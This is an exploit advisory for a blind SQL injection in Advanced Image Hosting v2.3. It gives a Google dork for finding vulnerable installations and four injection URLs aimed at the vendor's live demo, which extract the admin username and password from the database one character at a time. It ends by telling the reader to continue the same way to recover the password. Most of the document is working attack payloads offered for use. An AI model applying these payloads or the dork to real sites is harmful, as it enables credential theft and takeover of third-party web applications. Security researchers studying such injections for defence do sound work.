###################################################################
Advanced Image Hosting (AIH) Remote Blind SQL Injection 
###################################################################


###################################################
#[~] Author        :  boom3rang 
#[~] Greetz        :  H!tm@N, KHG, chs, redc00de
#[~] Vulnerability :  Blind SQL injection 
#[~] Google Dork   :  Powered by: AIH v2.3
--------------------------------------------------
#[!] Product Name  :  Advanced Image Hosting    
#[!] Product Site  :  http://www.yabsoft.info
#[!] Version       :  v2.3
#[!] Download      :  http://yabsoft.com/aihs-feature.php
###################################################

[!] AIH Blind SQL Injection.

PoC / Live Demo:
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),1,1))>100--++

First charcter of the username is char(100) -->  char="d"
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),2,1))>101--++

Second charter of the username is char(101) -->  char2="e"
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),3,1))>109--++

Next charter of the username is char(109) --> char3="m"
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),4,1))>111--++

And The last charter of the username is char(111) --> char4="o"
-------------
Like we see the username is "demo" now you can continue finding another charters for password, changing the number of charters 5,6,7,8,9,10........?>


##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################